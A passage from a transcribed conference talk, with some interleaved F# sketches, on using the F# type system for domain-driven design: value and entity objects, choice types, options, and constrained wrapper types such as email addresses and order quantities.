of those two things. It's not a particularly common area, but I think it's actually a quite profound thing to talk about. So first of all, I'm going to spend a little bit of time demystifying functional programming, because I think a lot of people are kind of scared. So I just want to take away some of that fear. I want to talk about how functional programming is actually a useful thing for real world applications. It's not just some academic theoretical thing. I'm going to compare F-sharp and C-sharp. How many people use C-sharp here? Everybody, right.
And I'm going to then talk about the F sharp type system. And then I'm finally going to talk about how you use the F sharp type system to design real things, really practical things. So let's start with demystifying functional programming. Why is it so hard? I think a lot of people are put off by it because it's very scary. You have all these words like functor and catamorphism, currying and monad. These are very scary sounding words. And I think the reason is, yeah, there's Homer, he's quite scared. The reason is because the mathematicians got there first and they named these words. Now, if we renamed the words differently, they wouldn't be so scary. So for example, I think these words are just unfamiliar. Not scary. So if we named things like functor, if we called it mappable instead of functor, and if we called it collapsible instead of catamorphism, we said aggregatable or chainable. So those are still words you might not understand what they mean, but they don't sound so scary. So here's Homer. I mean, he doesn't understand them, but he's not frightened by them anymore. It just means it's something you have to learn, just like you have to learn entity framework, or you have to learn the link, or you have to learn WCF, if anyone knows how to do that. So I tell you what, it's really scary, it's object-oriented programming. You just don't think it's scary because you already know it. But if you're a new person coming to programming and you're faced with object-oriented programming, this is what you have to deal with. You have to deal with all these scary words, like polymorphism and inheritance and interface and generics and covariance and countervariance and solid. And solid itself is five different things, SRP, OCP. No, there's a lot of things you have to remember. Each one of those abbreviations, and you've got IOC and DI and ABC and MVC and AOP and thousands of little things you have to know. So that's really scary. So functional programming is actually a lot less complicated than object-oriented programming. It's just that you're more familiar with object-oriented programming. The other thing about all these words is you're not going to need it for this talk, so I'm not even going to talk about any of them. All right, so don't worry that I'm going to be mentioning them. So let's talk about functional programming for real-world applications. So you've probably heard that function programming is good for mathematical stuff and it's good for complicated algorithms and it's really good for parallel processing, but you need a PhD in computer science to understand it. So the first three things are actually true. It is good for all of those things. It's so not true that you need a PhD. I'll tell you what, I think functional programming is really good for. It's really good for boring line of business applications, blobbers, I call them. So I think how many people make their living writing blobbers? Yeah, pretty much everyone writes boring line of business applications. So that's e-commerce websites and accounting packages and ETL data warehouses and I don't know, all sorts of stuff, back-end infrastructure, whatever. So that's basically what we do every day. But I think functional programming is actually really good for that. So let me tell you why. If you're going to be doing Blobber developments, first of all, you need to express requirements very clearly because you're working with customers and sometimes they don't quite know what they're talking about. 
You need to have really good communication. Secondly, you need to have a rapid development cycle because you want to get the code out there before the customers change their mind, which they probably will next month or next week. So if you can have a rapid development cycle, then you can actually get the code to live them and then they're happy. And finally, you need high quality because there's nothing worse than trying to fix a bug for something you did six months ago. You want to be working on new stuff. You don't want to be fixing old stuff. And then you look stupid if you have bugs as well. So what's interesting is that all these requirements are actually is where the agile movement came out of, XP came out of Chrysler. The whole thing of expressing requirements clearly, that's behavior-driven design and customer-on-site customer and all this kind of stuff, rapid iterations. F-sharp is good for that because it's concise and it's really easy to communicate. So it's actually better than C-sharp for that. The rapid development cycle, again, that's where you have your continuous integration and your continuous deployment. F-sharp is good for that. It has a REPL where you can actually code interactively. And it has many, many convenience to avoid boilerplate in your code. So you can actually churn out a lot of code much faster in F-sharp. And finally, the high quality deliverables, of course, you have your unit tests and so on. And in F-sharp, you can do unit tests as well, just because it's a.NET language. You can use N unit. But the type system can actually be used to ensure correctness at the design time. And that sounds, you can actually encode business logic into the types. That sounds like a very strange thing to be able to do, but you can actually do it. There's one other thing which is really important. If you're doing boring business applications, you need to have a bit of fun, OK? Because the applications might be boring, but hopefully at least your coding is fun. Now, the nice thing about F-sharp is F-sharp is actually a fun language to code in. I don't think anyone thinks that C-sharp or Java are fun languages. They're useful, but they're not exactly fun. I think Python is more fun. Ruby is a bit more fun. F-sharp is fun. And in fact, fun is even a keyword in F-sharp. So they know what they're talking about. So F-sharp is really good for Blobber development. So let me just show you some F-sharp and C-sharp codes. And you tell me which one you think is better for domain-driven design, OK? So in domain-driven design, we'll start with a simple immutable object. In domain-driven design, that's called a value object. So how would you implement a value object in C-sharp? Well, first of all, what is a value object? So a value object is basically an immutable object which is based on comparing all the properties. So if you have a personal name, two personal names, if the first names are equal and the last names are equal, they're basically the same thing. They might be different objects, different pointers, but from a logical point of view, they're the same object, which means they have to be immutable because they can't be changing underneath you. So here is a C-sharp version. We have a constructor with the first name, last name. We have two properties. I'm using private setters for immutability. Not really immutable. I could be using read-only if I was going to be super strict. But that's probably good enough. 
Something I've left off, though, is that personal name is a reference type, like all classes in C-sharp, which means if I have two personal names and I compare them, they're going to compare differently. So what I have to do is I have to override equality. So I have to override it, get hash code, and I have to override equals, and I have to add equals again, and I have to implement i, equitable, whatever it is. So there's a lot of code you have to write to do equality. And this is actually quite bug-ridden code. I don't know if any people have ever put objects in a dictionary or a set with a mutable ID and the hash code's changed and all of a sudden things break. It's very easy to get this kind of stuff wrong. So let's compare this with f-sharp. So in f-sharp, this is your personal name. You've got a first name and a last name, exactly the same thing, two properties. The whole thing fits on one under code. But of course, I need to do equality as well. So let me show you the code for equality. So yeah, there is actually no code for equality because in f-sharp, classes or types are equal by default. You don't have to override equality. So it's the other way around. If you want them to not be equal, you have to do it to work. And the best code is no code of all. If you don't write equality methods, you can't mess them up. So it's less work for everybody. Now, in domain driven design, you also have this concept of an entity object. An entity object is normally based on some sort of ID. And here's an example of a person. And the person ID, if they have the same ID, they're the same thing. But the contents of the thing can change. So this person has changed their name from Alice Adams to Bill Wobaggins. And generally, the content is mutable. That doesn't have to be mutable. So let's look at the C-sharp code, very same kind of thing, except I've removed the private setter to make it a mutable name. And I have to override equality again. And now I have to change, subtly change the way I compare things. Buried in the code is the important part. Let's look at the f-sharp code. Now, in f-sharp, if you want to change the way that equality works, you have to say custom equality. You have to override equality. And then you have to get hash code and equals just like the C-sharp code. The nice thing about f-sharp, though, is the person cannot be null. So you don't have to do any null checking ever, unless you're dealing with code that's coming from C-sharp, where you don't necessarily trust it. So. But in this case, we're comparing by ID. But in many situations, you might not want to compare by ID. Sometimes you might compare by person, by the name. Sometimes you might compare by ID. And it may be that you want to use different comparisons into different situations. So rather than always having a default comparison, you can pass in i-comparables or whatever it is. What I like to do in f-sharp is actually say no equality. And what that allows you to do is say that you cannot compare people directly. You can't say this person is equal to this person. You can say their IDs are equal. You can say their names are equal. But you can't actually, if you actually try and compare them directly, you actually get a compiler error, OK? Which is, I think, a very cool thing. I think most entities should have that by default. So the other thing in f-sharp is that the person class is immutable, unlike the C-sharp class. And let me tell you some of the advantages of immutability. 
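As a sketch of what is being described (the member names are mine), the value object and the entity might look like this in F#:

    // a value object: structural equality comes for free
    type PersonalName =
        { FirstName: string
          LastName: string }

    // an entity: equality is customised to compare by Id only
    [<CustomEquality; NoComparison>]
    type Person =
        { Id: int
          Name: PersonalName }
        override this.Equals(other) =
            match other with
            | :? Person as p -> this.Id = p.Id
            | _ -> false
        override this.GetHashCode() = hash this.Id

Marking the entity with [<NoEquality; NoComparison>] instead would make a direct person1 = person2 comparison a compile-time error, which is the stricter option being recommended here.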
So if it's immutable, the only way you can change it is make a new one. You can't just change the property. You have to create a whole new person every single time. And there are some syntax things in f-sharp that make that not so hard. But if you do have to create a new person every single time, the advantage of that is you can validate the data on construction. So in the constructor, you can say it's the name blank or whatever. And if it's a valid thing, you can return a new person. And if it's not a valid thing, you can not return a new person. And that's the only way you can create a person is through that constructor. And that means that any change has to go through that checkpoint, which means that there's only one place you have to enforce invariance. So I don't know if you've ever had code on the setter of a property. You've had to check that it's not blank or check that it's not null. And then if it is null, what do you do? You're going to throw an exception, or you're going to have an object which is in an invalid state. You don't really have very many good solutions to that problem. If you don't allow an invalid object to be created in the first place, you eliminate a whole class of problems right there. So let's have a look at the C-sharp code that we've got so far. There we go, the personal name and the person. So let me ask you a couple of questions. Do you think this is a reasonable amount of code to write for these two simple objects? All right, I think the answer is no. I think that's way too much code. And secondly, do you think a non-programmer could understand this? If I was showing it to an in-house customer and I say, have I got the definition of a name right? Is this what you mean by a personal name? I think they would say, well, I can't understand all this weird stuff. The other thing is you can't really tell which ones are values and which ones are entities. You can use market interfaces. But the important stuff is sort of buried right in the middle of the code. It's not at all obvious how they compare the ones of value type, and it compares on properties. And the other one is an entity, and it compares on its ID. OK, let's look at the F-sharp code. So there's the personal name, and there's the person. So let me ask you the same two questions. Do you think this is a reasonable amount of code to write for a simple object? And I think, yes, I think there's pretty much a small amount of code you shouldn't get away with writing. Secondly, do you think that a non-programmer could understand this? If I went to somebody and said, have I got the right definition for a personal name, like a business analyst or something, and would they say, yeah, I can understand that? I don't understand F-sharp, but I can look at this code and say, yeah, actually you're missing a middle initial, or you're missing an email address or something. It's pretty obvious just by looking at it. You don't have to be an expert in the language to understand this code. So comparing C-sharp and F-sharp. So this is just now, I'm not saying that C-sharp is a bad language, but I'm saying from the design point of view, if you're just designing types, I think that F-sharp wins out over C-sharp. Value objects are really easy. Entity objects are really easy. Value objects by default. Immutable objects by default. You can tell them apart, and it's easy to understand by non-programmer. So if you do nothing else, you might consider just using F-sharp for doing your types or your classes. 
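The syntax being alluded to is the copy-and-update expression; a minimal sketch, reusing the PersonalName record from above:

    let alice = { FirstName = "Alice"; LastName = "Adams" }

    // "changing" an immutable record means building a new one that shares the untouched fields
    let married = { alice with LastName = "Armstrong" }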
And it's just an assembly. You can link it in with your main C-sharp code. So if you want an easy way to create immutable classes, have an F-sharp assembly and just do that. Don't have to write any other F-sharp code whatsoever. Just do that bit and then use those classes in C-sharp. So this last thing, whether it's understandable by a non-programmer, I think that's a really important point. Again, it's all about communication. So let's look at F-sharp for domain-driven design. And like I said, domain-driven design is about communicating a domain model within the team. So communication is a hard problem. If we take this word UNIO-NIZE, what does that word mean? Well, if you're an activist, that might mean unionize. If you're chemists, it might mean un-ionize. So the same word can mean two different things to do two different people. So in domain-driven design, there's this concept of a bounded context, a framework within which the words mean something. So if you're talking about social activism, unionize means one thing. If you're talking about chemistry, un-ionize means something different. So different domains, different bounded contexts, same word. So it's very important to define the context that you're using that word in. So let me give you another example. SPAM. So if you run a supermarket, spam means one thing. And if you're an email admin, spam means another thing. These are kind of cheap shots. These are pretty easy. Everyone knows these ones. What about products, though? What does a product mean? So this is something you might run into. Like if you're in the sales team, a product is something you can sell. But if you manage a warehouse, a product might be a physical thing that you can put in a box. And sometimes the things you can sell are not necessarily the same things that you can put in a box. And you start getting this miscommunication between the teams. So one of the goals of Domain with Design is to define these contexts and make sure the words are used appropriately in each context. Here's another one. Customer. You probably run into this one, too. From a marketing point of view, a customer, if anyone has an email that you can send them spam to. If you're in finance, a customer is someone who's given you money. It's a different definition. And it affects your design, because a customer who's given you money, you might have an account ID, and you might have a current balance and stuff. And from a marketing point of view, a customer is just an email address, and maybe not even a name. So this brings us to the topic of ubiquitous language. So if you're working in a domain like chemistry, say, chemists have these words, like iron, and atom, and molecule, and polymer, and so on. Now as developers, if you're working on an application in the domain of chemistry, it's very important that we use the same words that chemists use. We shouldn't talk about molecules as an aggregate of atoms, and we shouldn't talk about polymers as a linked list of atom aggregates or something. Those are techy words. We should use the same words that the customers use. So again, part of the process of domain-driven design is to come up with a set of words that the developers can use and the domain experts can use, and that we all agree on them. And then when we talk about a polymer, we have a class called polymer. We don't have a class called list of atom aggregates or something. So again, the ubiquitous language can look similar in different domains. 
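To make that concrete, the same word can get a different type in each bounded context; the module and field names below are mine, not from the talk:

    module MarketingContext =
        // a marketing "customer" is anyone we can send email to, maybe without even a name
        type Customer = { Name: string option; EmailAddress: string }

    module FinanceContext =
        // a finance "customer" is someone who has given us money
        type Customer = { AccountId: int; Balance: decimal }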
So in the sales domain, you might have something called a customer and something called a product. In the warehouse domain, again, you might have something called a product, but it's a different kind of thing. But defining the ubiquitous language in a domain is a very important part of domain-driven design. So here is an example of some F-sharp code for a domain. This is the domain of a card game. How can we tell it's about a card game? Because there's a word at the top that says this is a card game. If this was in a different domain, if I was in the domain of a clothes shop, then suits would mean something completely different. And if I was in the domain of the navy or something, then deck would mean something completely different. But in the domain of a card game, in the bounded context of a card game, these are the things that matter. And so this is the ubiquitous language right here. So let me just go through this F-sharp code. The vertical bar means a choice. So a club or a diamond or a spade or a heart. The star means a pair in this case. So a card is: pick one from suit, pick one from rank. That's your card. List is actually a keyword in F-sharp. That's very nice. And this one with an arrow is a function. So this means to deal something. You start with a deck. The one on the left side of the arrow is the input. On the right hand side of the arrow is the output. So the input is a deck. The output is a different deck with a missing card, plus a card on the table. So that's the output. So that's the entire domain on one page. So let me ask you the same questions. Is this a reasonable amount of code to write for this domain? I've got nine types on one page. So I think that's pretty good. In C-sharp, if I was doing this, there would be nine files in a folder, probably. Do you think a non-programmer could understand this? If I had left off something like the king, do you think I could show this to a non-programmer and say, have I got all the cards right? And they would say, yeah, no, you left off king. It's like, oh, thanks. It wouldn't be buried in some enum somewhere. Another important point about this code is there's nothing about databases here. There's nothing about user interface. This is persistence ignorance. There's nothing about how it gets stored. I don't care whether you store this in a SQL database, whether you store it in a file system. If you want to be web scale, you can store it in Mongo. It doesn't really matter. It's not part of the domain how it's stored. And the other thing about this code is this is code, and it's a design as well. It's a design and code at the same time. And that is one of the agile philosophies, really, is that the most accurate thing to represent your design is the code. Comments go out of date. Documentation goes out of date. The only thing that is the truth about your application is the code itself. So it's nice if your code can actually represent your design in a nice way. And this is actually not pseudocode. This is compilable code. I could take this code, stick it in Visual Studio, and run it, and get some stuff out. So this is not pseudocode. So I think that's really quite a powerful thing. If you do this kind of approach, you don't need to have your UML diagrams. OK. No UML, no documentation, just the code itself. The code acts as documentation.
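The card game domain being read out looks roughly like this; the exact ranks and the player and game records are reconstructed from the description rather than copied from the slide:

    module CardGame =

        type Suit = Club | Diamond | Spade | Heart

        type Rank =
            | Two | Three | Four | Five | Six | Seven | Eight | Nine | Ten
            | Jack | Queen | King | Ace

        // "star means a pair": a card is one pick from Suit and one from Rank
        type Card = Suit * Rank

        type Hand = Card list
        type Deck = Card list

        type Player = { Name: string; Hand: Hand }
        type Game = { Deck: Deck; Players: Player list }

        // "arrow means a function": dealing turns a deck into a smaller deck plus the dealt card
        type Deal = Deck -> Deck * Card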
If you change that code, let's say you add a new type, a new kind of card, for example, your code will fail to compile, because it's compilable code. Right, so that's the sort of introduction to domain-driven design. And let's talk about the F-sharp type system. So the F-sharp type system is very different from what you're used to in C-sharp. So in C-sharp, you have classes. In F-sharp, you have types. Types are not the same thing as classes. And the F-sharp type system is called an algebraic type system, which is the same type system that's used in Haskell, and the same thing that's used in OCaml and a couple of other languages, very common in functional languages. So algebraic is another one of those mathematical words. So I'm going to use the word composable instead. So it's a composable type system. So unlike objects or classes, you can actually compose the types together to make new types. So what do I mean by composable? It's like LEGO, right? If you take two LEGO bricks and you stick them together, you've got another thing that you can then stick other things to. You can build up complex things by gluing smaller things together. So that's what composable means. So if you do have two smaller things, how do you glue them together to make a bigger thing? Well, in an algebraic or composable type system, there are basically two ways you can glue them together. You can either multiply them together, so a new type is an old type times another old type. Or you can add them together, so a new type is a type plus another type. Now at this point, you might be thinking, well, that's just crazy. How can you add two types together? How can you multiply two types? What does that even mean? That just sounds silly. But I think if you just hold on another five minutes, all will become clear. So let's start off with the times. So here's a very simple function. A function is basically a black box. It's got input and it's got an output. That's all a function is. So I'm going to take the function add1, for example. So on the input, I have the set of numbers, integers. On the output, I have the set of integers. And the way you write that in F-sharp is int arrow int. So int is the input, and the function output is an int. So that's pretty straightforward. Now what happens if we want to add a pair of numbers together? So the input is a pair and the output is the two numbers added together. So the output is easy. We can say the output's an int. But what's the input? What kind of type is that input? Now we could define a class called Pair, but that's not what I want to do. It's not built from smaller pieces. I want to actually create this type by combining two other types together. So let's look at how we can do that. So let's think about what a pair is. So a pair basically means you pick one from the first pile and you pick another one from the second pile, right? So one column and the second column. So let's say there are four numbers. Obviously there are really 64K or 4 billion numbers, but let's say there are four numbers only. So you can pick four from this pile and you can pick four from the second pile. How many possible pairs are there? There's four times four, 16 possible combinations, yeah? So that's multiplying them, right? Four times four is 16. Here's another example. Let's say you have a pair of booleans. So true-true, true-false, false-true and false-false, right?
So again, the first column is you pick one from two possibilities and the second column is you pick one from two possibilities and the total number of combinations is two times two. So the way you get the pair is by multiplying the first column by the second column. So that's the total number of possibilities. So in fact, that's exactly how you do it in F-sharp. You say a pair of ints is written as int star int, int times int. And a pair of booleans is written as bool star bool. So literally multiplication, OK? So you can see where that's coming from. It looks a little bit weird at first, but it's actually quite sensible if you think about it. All right, well, that seems kind of academic. Maybe say, OK, well, it's kind of theoretical. Let's look at a real example of how you might see it in a real business application. So let's say you have a bunch of birthdays. So Alice was born on January 12th and Bob was born on February 2nd and so on. How can I represent these birthdays using the type system? Well, we have a set of people. The first column is a set of people, all the people in the world. The second column is a set of all the dates in the world. And every possible combination of a person and a date is multiplication. So that's how I get the birthday type is the every possible combination of the people type and the date type. So in code, in F sharp code, you would write it like this. Type birthday equals person times date. And that's how you create a new birthday type. Right, so that's one kind. So that's what they call a product type or a multiplication type. What about the other one where you're adding things together? So let's look at how you might represent a choice. So here's a function that says whether you have a fever or not. You're passing some sort of temperature. And if your temperature is more than 37 and 1⁄2 or 38, where it says, OK, you've got a fever. And if it's in Fahrenheit, there's 100s, say, and you get a fever. So how can I document what the input is? Well, the output's tabooly, so that's easy enough. But the input is a choice. I can either pass in a Fahrenheit temperature or I can pass in a Celsius temperature. How do I represent that? So if you think about it, this is the same kind of thing. I've got a list of possible temperatures in Fahrenheit. And I've got a list of possible temperatures in Celsius or centigrade. But this is slightly different because I pick one from the first pile or I pick one from the second pile. So let's say there are four in the first pile and four in the second pile. How many possible combinations are there? There's actually only eight. I pick one of these four or I pick one of these four. So there's eight possible combinations. So that's addition. It's what they call a sum type. And how do you represent it in F-sharp? They're both, say, integers. So you have to have some way of differentiating the integers, so you tag them with a little symbol. So I'm going to tag the Fahrenheit ones with the letter F. And I'm going to tag the Celsius ones with the letter C. And then you write that in F-sharp as the temperature type is a choice between an integer, which is tagged with F, and a, say, a float that's tagged with C. So that's how you'd write this choice type in F-sharp. It could be one or the other, but not both at the same time. All right. So again, that's maybe a bit strange. But let's have a look at a real example. So here's a payment method. 
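Before the payment method example, here is a minimal sketch of the two kinds of composition just described; the Person record is a stand-in and the fever thresholds are only illustrative:

    type Person = { Name: string }

    // a product ("times") type: every possible combination of a person and a date
    type Birthday = Person * System.DateTime

    // a sum ("plus") type: a tagged choice, one case or the other, never both
    type Temperature =
        | F of int
        | C of float

    let isFever temp =
        match temp with
        | F degreesF -> degreesF >= 101
        | C degreesC -> degreesC >= 38.0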
So as an e-commerce business or maybe as a shop, I can take cash, I can take checks, I can take credit cards, say. And you'd represent that as three different choices. I can take cash, I can take checks, and I can take credit cards. Three different choices right there in front of you. One of the nice things about these choice types is you can have extra data attached to different pieces. You can think of them as different constructors. You might have a cash constructor and a check constructor. And the cash, you don't need any extra information. For a check, you might need the check number. And for a credit card, you'd need the card type and the card number, so a pair. And when you actually use these things, you want to look inside and see which particular choice was actually used. So when, let's say, you want to print the payment method on a receipt or something. What you do is use a match statement, which is the F-sharp equivalent of a switch, basically, or case statement. And if it's cash, you say print cash. If it's a check, you say pay by check. And one of the nice things about the matching is it extracts the information inside at the same time. So you match and you suck out the data. And finally, if I pay by card, I can get the card type and the card number at the same time. So that's how choice types work in F-sharp. And it's very cool that you do this match and assignment in one step. So these are not just enums, like in C-sharp, because enums are just integers behind the scenes. This has, these are more like subclasses, and each subclass has its own data. So you might say, well, why don't you model it with inheritance? Why don't you use subclasses? Why have this special kind of choice type? So how would you implement this in C-sharp or an OO language? So what you'd probably do is have some sort of interface or abstract-based class that represents all of them, an I payment method. And then you'd have a cash class or subclass with a constructor, you'd have a check class that had its own data, and you'd have a credit card class that had its own data. So the problem with this approach is that the interface has no common behavior really between the two. I mean, you might say, well, yeah, the printing method is a common behavior. But that's really in that context. I don't think it should be part of the core domain class that it can print itself on a receipt. That's really mixing, you know, that's not separating your concerns well enough. You should be able to print it on a receipt is a different thing. There's actually no common methods that belong to the domain. The other nice thing about the F-sharp approach is the exadata is really obvious. If I say, well, what do I need to store a credit card? It's like, well, I need a card type and I need a card number. Is that obvious from the C-sharp codes? It's kind of buried in the constructor. It's buried in the properties. It's not really obvious where it is. It's basically scattered around in many locations. And in C-sharp, that would be four different files, probably. You could have one class per file, four different files. In F-sharp, it's four lines, four lines of code in one place. The other thing about the F-sharp code is it's closed, which means that you can't add a fourth option. That is your limit. If you want to add a fourth option, you can, but all your code will break. And then you have to fix up your code, which I think is a good thing. 
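As code, the choice type and the match expression being walked through look roughly like this; the concrete case and field names are approximations:

    type CheckNumber = int
    type CardType = Visa | Mastercard
    type CardNumber = string

    type PaymentMethod =
        | Cash
        | Check of CheckNumber
        | CreditCard of CardType * CardNumber

    // matching on the choice and unpacking its data happen in one step
    let printPaymentMethod payment =
        match payment with
        | Cash -> printfn "Paid in cash"
        | Check checkNo -> printfn "Paid by check %i" checkNo
        | CreditCard (cardType, cardNo) -> printfn "Paid with %A %s" cardType cardNo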
If you add a new kind of payment method, you want your code to break until you've handled that particular new payment method in all your class, in all your code. In OO, in the OO version, anything that implements the I payment method is valid. So you might get an unpleasant surprise. I might implement an evil payment method. As long as it implements the interface, it's totally valid. Now in some cases, you might want open. You might want to have, oh, anybody can implement this interface and it's fine. I trust them. But in business logic, most of the things are actually quite restricted. You have a restricted set of options like payment methods. And adding a new one is actually something you want to know about. It's not something that you should just slip in behind the scenes without telling anybody. So what are types for in functional programming? It's an annotation to a value for type checking. So here we go. It's just like in C-sharp. You say this is an int. It takes an int and it outputs an int. But it's also a domain modeling tool. So in this case, I can tell you that to deal something, you have a deck of cards. And you input this and you output that. So you can actually model the domain using the types. And it's both at once, which means that your domain modeling tool is also compiled into your code. So your code can never match the domain. So I think of a static type system like this is almost like having compile time unit tests. If I have a unit test that says, oh, a payment card must always have a card number or something, I don't need to have a unit test for that. It will not compile if the code doesn't match the domain. So it's a compile time unit test. So type all the things. It's one of the mottos of the static type people, especially the functional programmers. All right, so what can we do with this type system? Let's actually put it to use, do something useful with it. I'm going to start with optional values. This is a really common case. So here we have our personal name. And the middle initial is optional. And the first and last name are not optional. And I can't tell. So can I use the type system to indicate that? So let's go back to our strings. So let's say we have a function that's the length of a string, really, really simple function. And the input is a string, and the output is an int. That's a very simple function. The only problem is that we have null in this list of strings. And null is evil because it's pretending to be a string. You cannot use null as a string. If I say setPhase as to null, that doesn't make any sense. It's illogical. So null is not really a string. It's in the pile of strings. If I say to null, are you a string? I say, yeah, yeah, I'm a string. And then you say, well, give me your length. And you say, ha, you know, I'm going to crash your application now. And it's like, well, you told me you're a string. It's like, well, yeah, I'm pretending to be a string, but I'm not really. So I think of null as like Saruman. OK, it's going to betray you behind your back. It pretends to be one thing, but it's something evil. So in F sharp, null is not allowed. Null is not a valid string. Well, actually, in F sharp, unfortunately, it is a valid string because of the way that it has to be compatible. But most of the classes you create, your own classes in F sharp are not allowed to be null. So you never have to deal with nulls in general. So no nulls. So if you don't have nulls, what can you do instead? So we have a list of strings here. 
And null is not in them. But we want to say, well, maybe the string's missing. So how can we indicate that? Well, we've already seen how we can do that because we have this choice between something and nothing. So the way we represent that in F sharp is exactly that thing. You have a choice between a string, a valid string, which is not null, and nothing at all. And it's a sum type. It's a choice type. And we tag the strings with some string. And we tag the missing with nothing. So you see the some string or it's nothing. And we write that like that. So it's either some string or it's nothing. So that's a type that you would see a lot in F sharp. And you say, oh, that's really cool. You have the optional string. And then, oh, I want optional int as well. Oh, optional Boolean's really important. So you start having all these optional types floating around. And at some point, you say, there must be an easy way to that. So let me define a generic type that takes a type parameter. So in this case, it's an option of any type. And it's either some of that type or it's nothing, none. And that type is actually built in to F sharp. So this option type is built in. And it's used a lot in the F sharp libraries. So with this option type, we can rewrite the middle initial to say it's an option of a string. And in F sharp, you can actually have a nicer syntax where you call it a string option rather than an option of a string. So I think that's actually much nicer if I was showing that to someone I say, look, it's an optional string. I think it's pretty easy to understand. All right, the next kind of type I'm going to talk about is what I call single choice types. And this is an example of a single choice type. It's something and it's choice A of something. But there is no choice B. There's only one choice. Why would you only have one choice? So let's look at some examples. Here's an email which has only got one choice of an email. Customer ID has only got one choice called customer ID. Why would you only have one choice? What possible use is that? So think about this for a second. Is an email address just a string? All right, in your domain, can you add hello to it without breaking code? Can you reverse it without breaking stuff? An email address isn't a string. Once you've validated it, you really shouldn't be messing with it. You shouldn't be adding things and subtracting things. You shouldn't be reversing it. It's like it's a thing. It's an email address. It happens to be represented as a string, but it isn't really a string in your domain. Is a customer ID just an int? Can you add five to your customer ID and still get a valid customer ID? Probably not. I mean, maybe you can. But your customer IDs, they might be represented by ints in your database, but they're not really ints in a domain. So by using single choice types, you can keep these types separate from their underlying representation. So for example, if you have an email address which is represented by a string and a phone number which is represented by a string, by wrapping them in a single choice, you've now made them different types, distinct types, and you can no longer compare an email address with a string, and you can't compare it with a phone number, and you can't compare a phone number with a string. They're just completely different types all together. And you'll get compile errors, compile errors if you try and compare them. 
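A small sketch of what has just been covered: the built-in option type for the middle initial, and single-case wrapper types that keep an email and a phone number from being mixed up even though both are strings underneath:

    // already built into F#, shown only for reference:
    // type Option<'T> = | Some of 'T | None

    type PersonalName =
        { FirstName: string
          MiddleInitial: string option   // the optionality is now part of the design
          LastName: string }

    type EmailAddress = EmailAddress of string
    type PhoneNumber = PhoneNumber of string

    // EmailAddress "a@b.com" = PhoneNumber "a@b.com"  would not even compile:
    // they are distinct types despite the identical underlying representation.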
Similarly, if you have a customer ID and an order ID, and this is a very common problem, they're both represented by ints, and in your codes, you want to keep them separate in your query strings to your DAO or whatever. They're not the same thing. If you try and compare them, you should actually get a compile time error. So are you familiar with the phrase primitive obsession? So the primitive obsession is when you use ints instead of domain objects like this. You shouldn't be using ints to represent customer IDs. The other nice thing about using a special type for the email is you can wrap it in a constructor that does validation. So an email address is not just a normal string, it has to have an at sign in it, say. So very crude validation is that it has to match some sort of regex. So in this case, it has to have an at sign in it. So in the constructor, you can say, well, if it does match that regex, then you return a new email address, a wrapped email address. But here's the problem. What happens if it doesn't match the regex? What are you going to do? You're going to return null? No, because null is not a valid email address. You're going to throw an exception. Well, that seems a bit harsh. Just because I passed in a invalid email, it's like, can't you just give me something more useful that I can process as a, well, they have to catch exceptions all the time. Well, I think we already seen the answer to this. You use the option type. So if it's a valid email, you say, yes, it's an email, some email, and if it's not a valid email, you turn nothing. It's like not a valid email. But this is a proper type. You're not throwing exceptions. You're not returning null. And you can tell what it does, unlike the null case or the exception case, you can actually tell what it is by looking at the signature for the function. So you might think that the signature is, give me a string and I'll give you back an email address. And that would be true if I was using nulls, and it would be true if I was using exceptions. But I'm not using either of those. I'm using options instead. So the signature says, you give me a string. I might give you back an email address. I might not. You'll have to handle both cases, because depending on what string you give me, I might give you back nothing at all, because it's not valid. And you are forced to handle both cases. When you take this code, at some point in your code, you're going to have to say, well, is it something or is it nothing? But you can pass it around. You don't have to handle it straight away. It's not like an exception or a null. You can pass it around until somebody has to deal with it. So let's look at another example. Here's a string 50. In this case, I want to make sure that the string is constrained to be less than 50 characters long. So again, I have a little in the constructor. I have a little test. Is it less than 50? If it is less than 50, I can return a valid string 50. And if it's not a valid, if it's not, I return nothing. So the constructor, the signature for the constructor looks like this. Pass in a string, and I might get better string 50 or I might not, depending on whether you passed in a string that was too long or not. Here's another example. If I say this is an e-commerce system, and I've actually seen this in a real e-commerce system, what is wrong with that picture is that I have like a million things in my shopping cart. That should not be possible. I shouldn't really be able to add a million things. 
Or maybe I can, but most shopping sites will not let me do that, but they might let me do that because somebody has only represented it by an int behind the scenes. So what I really should do is create a new type called an orderline quantity. It wraps an integer. It's not a normal integer. It can't be negative. It can't be 2 billion. There's going to be some sort of constraints on it. And so the nice thing about an F-sharp is I can create a new type just for this domain. It's because it's one line of code. It's really easy. In C-sharp, I should probably do the same thing too, but I probably can't be bothered because it's a lot of work. So most people don't actually do this. And this is the kind of thing where you get bugs in your code because you represent it as an int. And then you have to have special code to handle negatives, special code to handle more than 1,000 or something. Don't have that code. Just don't allow it to be created in the first place if it's not the right number. So in this case, it has to be greater than zero. So even zero is not a valid number for a shopping cart quantity. So if I do something with it, I'm going to have to handle the case where I guarantee by having this type is between 1 and 99. I literally cannot have a zero quantity item in my basket. Yes? AUDIENCE member 1, question. The question is, where would that constructor be implemented? The answer is it would be implemented normally near the type itself. So in Fsharp, you have a module which is basically a namespace or a kind of grouping of codes. And what you can do is you can actually make sure that the constructor is the only way. You can hide the built-in constructor, and you can make sure that people are forced to go through that constructor. And that would be the only way. It's like having a private constructor and then having a public factoring method. And you'd put them together in the same file. Does that make sense? So again, here we return something or we return nothing. So every time I add something to my order line quantity, I have to take into account that I might get something back which isn't an order line quantity. So if I subtract 1, I might get nothing. And in my code, I'll have to say, well, what happens if I get nothing back? Well, OK, maybe I have to move that line from the basket. I'm forced to deal with that code. It reduces bugs just by doing this. So let's have a look at our code quickly, the challenge. So our challenge was how do we do optionals? And we're going to rewrite this now to use constrainString, string50 rather than just a plain old string. So that's a lot easier to see what's going on. And then the other thing, one of the questions is how do I make it very clear which sets of properties have to be grouped together for currency purposes? And it's really easy in F sharp just to create two new little small types. And then the big type just contains the small types. And because it's really easy to do, I mean, this is eight lines of codes. And you can all be in one file. You don't have to create three separate classes and three separate files. So in F sharp, you tend to get a lot more small types than in C sharp just because it's so easy to do. There's one thing we have not talked about, which is this email verified. So this is this Boolean. It's only allowed to be set to true if the email has been verified. So let's have a look at that for a second. So we have some business rules around this. 
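Before turning to those business rules, here are the constrained types from this stretch as code, restating the EmailAddress wrapper so the sketch stands alone; each constructor validates and returns an option, so an out-of-range value simply cannot be constructed:

    type EmailAddress = EmailAddress of string
    type String50 = String50 of string
    type OrderLineQty = OrderLineQty of int

    open System.Text.RegularExpressions

    // string -> EmailAddress option (the regex is deliberately crude, as in the talk)
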